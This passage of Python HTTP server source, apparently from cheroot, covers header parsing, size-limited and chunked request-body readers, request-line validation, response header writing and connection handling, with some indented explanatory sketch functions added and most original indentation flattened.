b'Accept', b'Accept-Charset', b'Accept-Encoding',
b'Accept-Language', b'Accept-Ranges', b'Allow', b'Cache-Control',
b'Connection', b'Content-Encoding', b'Content-Language', b'Expect',
b'If-Match', b'If-None-Match', b'Pragma', b'Proxy-Authenticate', b'TE',
b'Trailer', b'Transfer-Encoding', b'Upgrade', b'Vary', b'Via', b'Warning',
b'WWW-Authenticate',
]
if not hasattr(logging, 'statistics'):
logging.statistics = {}
class HeaderReader:
"""Object for reading headers from an HTTP request.
Interface and default implementation.
"""
def __call__(self, rfile, hdict=None):
"""
Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP
spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError('Illegal header line.')
v = v.strip()
k = self._transform_key(k)
hname = k
if not self._allow_header(k):
continue
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = b', '.join((existing, v))
hdict[hname] = v
return hdict
def _allow_header(self, key_name):
return True
def _transform_key(self, key_name):
# TODO: what about TE and WWW-Authenticate?
return key_name.strip().title()
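# Illustrative sketch (added for exposition; not from the original test suite):
# feeding a raw header block to HeaderReader. io.BytesIO stands in for the
# connection's rfile; the header names and values are invented for this demo.
def _header_reader_sketch():
    raw = io.BytesIO(
        b'Host: example.com\r\n'
        b'Accept: text/html\r\n'
        b'Accept: text/plain\r\n'
        b'\r\n',
    )
    headers = HeaderReader()(raw)
    # 'Accept' is listed in comma_separated_headers, so repeats are folded.
    assert headers[b'Accept'] == b'text/html, text/plain'
    assert headers[b'Host'] == b'example.com'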
class DropUnderscoreHeaderReader(HeaderReader):
"""Custom HeaderReader to exclude any headers with underscores in them."""
def _allow_header(self, key_name):
orig = super(DropUnderscoreHeaderReader, self)._allow_header(key_name)
return orig and '_' not in key_name
class SizeCheckWrapper:
"""Wraps a file-like object, raising MaxSizeExceeded if too large.
:param rfile: ``file`` of a limited size
:param int maxlen: maximum length of the file being read
"""
def __init__(self, rfile, maxlen):
"""Initialize SizeCheckWrapper instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded()
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See https://github.com/cherrypy/cherrypy/issues/421
if len(data) < 256 or data[-1:] == LF:
return EMPTY.join(res)
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
next = __next__
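# Illustrative sketch (added for exposition): SizeCheckWrapper raises
# errors.MaxSizeExceeded once more than ``maxlen`` bytes have been read.
# The byte counts below are invented for demonstration only.
def _size_check_sketch():
    wrapped = SizeCheckWrapper(io.BytesIO(b'x' * 32), maxlen=16)
    try:
        wrapped.read()
    except errors.MaxSizeExceeded:
        pass  # reading 32 bytes exceeds the 16-byte cap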
class KnownLengthRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
:param rfile: ``file`` of a known size
:param int content_length: length of the file being read
"""
def __init__(self, rfile, content_length):
"""Initialize KnownLengthRFile instance."""
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:rtype: bytes
:returns: chunk from ``rfile``, limited by size if specified
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.remaining -= len(data)
return data
next = __next__
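# Illustrative sketch (added for exposition): KnownLengthRFile only exposes
# ``content_length`` bytes of the underlying stream and then reports EOF by
# returning an empty string, as described in the class docstring above.
def _known_length_sketch():
    body = KnownLengthRFile(io.BytesIO(b'hello world'), content_length=5)
    assert body.read() == b'hello'
    assert body.read() == b''  # exhausted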
class ChunkedRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
:param rfile: file encoded with the 'chunked' transfer encoding
:param int maxlen: maximum length of the file being read
:param int bufsize: size of the buffer used to read the file
"""
def __init__(self, rfile, maxlen, bufsize=8192):
"""Initialize ChunkedRFile instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded(
'Request Entity Too Large', self.maxlen,
)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError(
'Bad chunked transfer size: {chunk_size!r}'.
format(chunk_size=chunk_size),
)
if chunk_size <= 0:
self.closed = True
return
# if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError('Request Entity Too Large')
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
'got ' + repr(crlf) + ')',
)
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
self.buffer = EMPTY
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
self.buffer = EMPTY
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
"""Read HTTP headers and yield them.
Returns:
Generator: yields CRLF separated lines.
"""
if not self.closed:
raise ValueError(
'Cannot read trailers until the request body has been read.',
)
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError('Request Entity Too Large')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
yield line
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
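# Illustrative sketch (added for exposition; not from the original test suite):
# decoding a body sent with the 'chunked' transfer coding. io.BytesIO stands in
# for the socket's read file; the chunk sizes and payload are invented.
def _chunked_rfile_sketch():
    body = io.BytesIO(b'5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n')
    reader = ChunkedRFile(body, maxlen=1024)
    # read() keeps fetching chunks until the terminating zero-size chunk.
    assert reader.read() == b'hello world'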
class HTTPRequest:
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
header_reader = HeaderReader()
"""
A HeaderReader instance or compatible reader.
"""
def __init__(self, server, conn, proxy_mode=False, strict_mode=True):
"""Initialize HTTP request container instance.
Args:
server (HTTPServer): web server object receiving this request
conn (HTTPConnection): HTTP connection object for this request
proxy_mode (bool): whether this HTTPServer should behave as a PROXY
server for certain requests
strict_mode (bool): whether we should return a 400 Bad Request when
                we encounter a request that an HTTP-compliant client should not be
making
"""
self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = b'http'
if self.server.ssl_adapter is not None:
self.scheme = b'https'
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ''
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
self.proxy_mode = proxy_mode
self.strict_mode = strict_mode
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(
self.conn.rfile,
self.server.max_request_header_size,
)
try:
success = self.read_request_line()
except errors.MaxSizeExceeded:
self.simple_response(
'414 Request-URI Too Long',
'The Request-URI sent with the request exceeds the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
try:
success = self.read_request_headers()
except errors.MaxSizeExceeded:
self.simple_response(
'413 Request Entity Too Large',
'The headers sent with the request exceed the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
"""Read and parse first line of the HTTP request.
Returns:
bool: True if the request line is valid or False if it's malformed.
"""
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response(
'400 Bad Request', 'HTTP requires CRLF terminators',
)
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
if not req_protocol.startswith(b'HTTP/'):
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad protocol',
)
return False
rp = req_protocol[5:].split(b'.', 1)
if len(rp) != 2:
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad version',
)
return False
            rp = tuple(map(int, rp))  # Major.Minor must be treated as integers
if rp > (1, 1):
self.simple_response(
'505 HTTP Version Not Supported', 'Cannot fulfill request',
)
return False
except (ValueError, IndexError):
self.simple_response('400 Bad Request', 'Malformed Request-Line')
return False
self.uri = uri
self.method = method.upper()
if self.strict_mode and method != self.method:
resp = (
'Malformed method name: According to RFC 2616 '
'(section 5.1.1) and its successors '
'RFC 7230 (section 3.1.1) and RFC 7231 (section 4.1) '
'method names are case-sensitive and uppercase.'
)
self.simple_response('400 Bad Request', resp)
return False
try:
if six.PY2: # FIXME: Figure out better way to do this
# Ref: https://stackoverflow.com/a/196392/595220 (like this?)
"""This is a dummy check for unicode in URI."""
ntou(bton(uri, 'ascii'), 'ascii')
scheme, authority, path, qs, fragment = urllib.parse.urlsplit(uri)
except UnicodeError:
self.simple_response('400 Bad Request', 'Malformed Request-URI')
return False
uri_is_absolute_form = (scheme or authority)
if self.method == b'OPTIONS':
# TODO: cover this branch with tests
path = (
uri
# https://tools.ietf.org/html/rfc7230#section-5.3.4
if (self.proxy_mode and uri_is_absolute_form)
else path
)
elif self.method == b'CONNECT':
# TODO: cover this branch with tests
if not self.proxy_mode:
self.simple_response('405 Method Not Allowed')
return False
# `urlsplit()` above parses "example.com:3128" as path part of URI.
# this is a workaround, which makes it detect netloc correctly
uri_split = urllib.parse.urlsplit(b''.join((b'//', uri)))
_scheme, _authority, _path, _qs, _fragment = uri_split
_port = EMPTY
try:
_port = uri_split.port
except ValueError:
pass
# FIXME: use third-party validation to make checks against RFC
# the validation doesn't take into account, that urllib parses
# invalid URIs without raising errors
# https://tools.ietf.org/html/rfc7230#section-5.3.3
invalid_path = (
_authority != uri
or not _port
or any((_scheme, _path, _qs, _fragment))
)
if invalid_path:
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI: request-'
'target must match authority-form.',
)
return False
authority = path = _authority
scheme = qs = fragment = EMPTY
else:
disallowed_absolute = (
self.strict_mode
and not self.proxy_mode
and uri_is_absolute_form
)
if disallowed_absolute:
# https://tools.ietf.org/html/rfc7230#section-5.3.2
# (absolute form)
"""Absolute URI is only allowed within proxies."""
self.simple_response(
'400 Bad Request',
'Absolute URI not allowed if server is not a proxy.',
)
return False
invalid_path = (
self.strict_mode
and not uri.startswith(FORWARD_SLASH)
and not uri_is_absolute_form
)
if invalid_path:
# https://tools.ietf.org/html/rfc7230#section-5.3.1
# (origin_form) and
"""Path should start with a forward slash."""
resp = (
'Invalid path in Request-URI: request-target must contain '
'origin-form which starts with absolute-path (URI '
'starting with a slash "/").'
)
self.simple_response('400 Bad Request', resp)
return False
if fragment:
self.simple_response(
'400 Bad Request',
'Illegal #fragment in Request-URI.',
)
return False
if path is None:
# FIXME: It looks like this case cannot happen
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI.',
)
return False
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# https://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." https://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not
# "/this/path".
try:
# TODO: Figure out whether exception can really happen here.
# It looks like it's caught on urlsplit() call above.
atoms = [
urllib.parse.unquote_to_bytes(x)
for x in QUOTED_SLASH_REGEX.split(path)
]
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
path = QUOTED_SLASH.join(atoms)
if not path.startswith(FORWARD_SLASH):
path = FORWARD_SLASH + path
if scheme is not EMPTY:
self.scheme = scheme
self.authority = authority
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
        #     request    server     actual written   supported response
        #     protocol   protocol  response protocol    feature set
        # a     1.0        1.0           1.0                1.0
        # b     1.0        1.1           1.1                1.0
        # c     1.1        1.0           1.0                1.0
        # d     1.1        1.1           1.1                1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response('505 HTTP Version Not Supported')
return False
self.request_protocol = req_protocol
self.response_protocol = 'HTTP/%s.%s' % min(rp, sp)
return True
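    # Illustrative note (not from the original source): with a server protocol
    # of 'HTTP/1.1' and a request line of b'GET / HTTP/1.0\r\n',
    #     rp == (1, 0), sp == (1, 1)
    #     'HTTP/%s.%s' % min(rp, sp)  ->  'HTTP/1.0'
    # i.e. the response is written with the lower of the two versions, while a
    # differing *major* version is rejected above with a 505.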
def read_request_headers(self):
"""Read ``self.rfile`` into ``self.inheaders``.
        Ref: :py:attr:`self.inheaders <HTTPRequest.inheaders>`.
:returns: success status
:rtype: bool
"""
# then all the http headers
try:
self.header_reader(self.rfile, self.inheaders)
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
mrbs = self.server.max_request_body_size
try:
cl = int(self.inheaders.get(b'Content-Length', 0))
except ValueError:
self.simple_response(
'400 Bad Request',
'Malformed Content-Length Header.',
)
return False
if mrbs and cl > mrbs:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the maximum '
'allowed bytes.',
)
return False
# Persistent connection support
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1
if self.inheaders.get(b'Connection', b'') == b'close':
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b'Connection', b'') != b'Keep-Alive':
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == 'HTTP/1.1':
te = self.inheaders.get(b'Transfer-Encoding')
if te:
te = [x.strip().lower() for x in te.split(b',') if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b'chunked':
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response('501 Unimplemented')
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b'Expect', b'') == b'100-continue':
# Don't use simple_response here, because it emits headers
# we don't want. See
# https://github.com/cherrypy/cherrypy/issues/951
msg = b''.join((
self.server.protocol.encode('ascii'), SPACE, b'100 Continue',
CRLF, CRLF,
))
try:
self.conn.wfile.write(msg)
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
return True
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b'Content-Length', 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the '
'maximum allowed bytes.',
)
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
self.ready and self.ensure_headers_sent()
if self.chunked_write:
self.conn.wfile.write(b'0\r\n\r\n')
def simple_response(self, status, msg=''):
"""Write a simple response back to the client."""
status = str(status)
proto_status = '%s %s\r\n' % (self.server.protocol, status)
content_length = 'Content-Length: %s\r\n' % len(msg)
content_type = 'Content-Type: text/plain\r\n'
buf = [
proto_status.encode('ISO-8859-1'),
content_length.encode('ISO-8859-1'),
content_type.encode('ISO-8859-1'),
]
if status[:3] in ('413', '414'):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b'Connection: close\r\n')
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = '400 Bad Request'
buf.append(CRLF)
if msg:
if isinstance(msg, six.text_type):
msg = msg.encode('ISO-8859-1')
buf.append(msg)
try:
self.conn.wfile.write(EMPTY.join(buf))
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
def ensure_headers_sent(self):
"""Ensure headers are sent to the client if not already sent."""
if not self.sent_headers:
self.sent_headers = True
self.send_headers()
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
chunk_size_hex = hex(len(chunk))[2:].encode('ascii')
buf = [chunk_size_hex, CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
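    # Illustrative note (not from the original source): when chunked_write is
    # enabled, write(b'hello') emits b'5\r\nhello\r\n' (chunk size in hex,
    # CRLF, payload, CRLF); respond() later terminates the body with the
    # final b'0\r\n\r\n' chunk.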
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set ``self.status``, and :py:attr:`self.outheaders
<HTTPRequest.outheaders>` before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b'content-length' not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
needs_chunked = (
self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'
)
if needs_chunked:
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b'Transfer-Encoding', b'chunked'))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
# Override the decision to not close the connection if the connection
# manager doesn't have space for it.
if not self.close_connection:
can_keep = self.server.connections.can_add_keepalive_connection
self.close_connection = not can_keep
if b'connection' not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b'Connection', b'close'))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b'Connection', b'Keep-Alive'))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b'date' not in hkeys:
self.outheaders.append((
b'Date',
email.utils.formatdate(usegmt=True).encode('ISO-8859-1'),
))
if b'server' not in hkeys:
self.outheaders.append((
b'Server',
self.server.server_name.encode('ISO-8859-1'),
))
proto = self.server.protocol.encode('ascii')
buf = [proto + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
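    # Illustrative note (not from the original source): for an HTTP/1.1 server
    # with self.status = b'200 OK' and
    # self.outheaders = [(b'Content-Type', b'text/plain')], the write above
    # starts with b'HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n', followed
    # by any automatically appended Transfer-Encoding, Connection, Date and
    # Server headers and the blank CRLF line that ends the header block.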
class HTTPConnection:
"""An HTTP connection (active socket)."""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = io.DEFAULT_BUFFER_SIZE
wbufsize = io.DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
peercreds_enabled = False
peercreds_resolve_enabled = False
# Fields set by ConnectionManager.
closeable = False
last_used = None
ready_with_data = False
def __init__(self, server, sock, makefile=MakeFile):
"""Initialize HTTPConnection instance.
Args:
server (HTTPServer): web server object receiving this request
sock (socket._socketobject): the raw socket object (usually
TCP) for this connection
makefile (file): a fileobject class for reading from the socket
"""
self.server = server
self.socket = sock
self.rfile = makefile(sock, 'rb', self.rbufsize)
self.wfile = makefile(sock, 'wb', self.wbufsize)
self.requests_seen = 0
self.peercreds_enabled = self.server.peercreds_enabled
self.peercreds_resolve_enabled = self.server.peercreds_resolve_enabled
# LRU cached methods:
# Ref: https://stackoverflow.com/a/14946506/595220
self.resolve_peer_creds = (
lru_cache(maxsize=1)(self.resolve_peer_creds)
)
self.get_peer_creds = (
lru_cache(maxsize=1)(self.get_peer_creds)
)
def communicate(self):
"""Read each request and respond appropriately.
Returns true if the connection should be kept open.
"""
request_seen = False
try:
req = self.RequestHandlerClass(self.server, self)
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return False
request_seen = True
req.respond()
if not req.close_connection:
return True
except socket.error as ex:
errnum = ex.args[0]
# sadly SSL sockets return a different (longer) time out string
timeout_errs = 'timed out', 'The read operation timed out'
if errnum in timeout_errs:
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See https://github.com/cherrypy/cherrypy/issues/853
if (not request_seen) or (req and req.started_request):
self._conditional_error(req, '408 Request Timeout')
elif errnum not in errors.socket_errors_to_ignore:
self.server.error_log(
'socket.error %s' % repr(errnum),
level=logging.WARNING, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
except (KeyboardInterrupt, SystemExit):
raise
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
except Exception as ex:
self.server.error_log(
repr(ex), level=logging.ERROR, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
return False
linger = False
def _handle_no_ssl(self, req):
if not req or req.sent_headers:
return
# Unwrap wfile
try:
resp_sock = self.socket._sock
except AttributeError:
# self.socket is of OpenSSL.SSL.Connection type
resp_sock = self.socket._socket
self.wfile = StreamWriter(resp_sock, 'wb', self.wbufsize)
msg = (
'The client sent a plain HTTP request, but '
'this server only speaks HTTPS on this port.'
)
req.simple_response('400 Bad Request', msg)
self.linger = True
def _conditional_error(self, req, response):
"""Respond with an error.
Don't bother writing if a response
has already started being written.
"""
if not req or req.sent_headers:
return
try:
req.simple_response(response)
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
self._close_kernel_socket()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
def get_peer_creds(self): # LRU cached on per-instance basis, see __init__
"""Return the PID/UID/GID tuple of the peer socket for UNIX sockets.
This function uses SO_PEERCRED to query the UNIX PID, UID, GID
of the peer, which is only available if the bind address is
a UNIX domain socket.
Raises:
NotImplementedError: in case of unsupported socket type
RuntimeError: in case of SO_PEERCRED lookup unsupported or disabled
"""
PEERCRED_STRUCT_DEF = '3i'
if IS_WINDOWS or self.socket.family != socket.AF_UNIX:
raise NotImplementedError(
'SO_PEERCRED is only supported in Linux kernel and WSL',
)
elif not self.peercreds_enabled:
raise RuntimeError(
'Peer creds lookup is disabled within this server',
)
try:
peer_creds = self.socket.getsockopt(
# FIXME: Use LOCAL_CREDS for BSD-like OSs
# Ref: https://gist.github.com/LucaFilipozzi/e4f1e118202aff27af6aadebda1b5d91 # noqa
socket.SOL_SOCKET, socket.SO_PEERCRED,
struct.calcsize(PEERCRED_STRUCT_DEF),
)
except socket.error as socket_err:
"""Non-Linux kernels don't support SO_PEERCRED.
Refs:
http://welz.org.za/notes/on-peer-cred.html
https://github.com/daveti/tcpSockHack
msdn.microsoft.com/en-us/commandline/wsl/release_notes#build-15025
"""
six.raise_from( # 3.6+: raise RuntimeError from socket_err
RuntimeError,
socket_err,
)
else:
pid, uid, gid = struct.unpack(PEERCRED_STRUCT_DEF, peer_creds)
return pid, uid, gid
@property
def peer_pid(self):
"""Return the id of the connected peer process."""
pid, _, _ = self.get_peer_creds()
return pid
@property
def peer_uid(self):
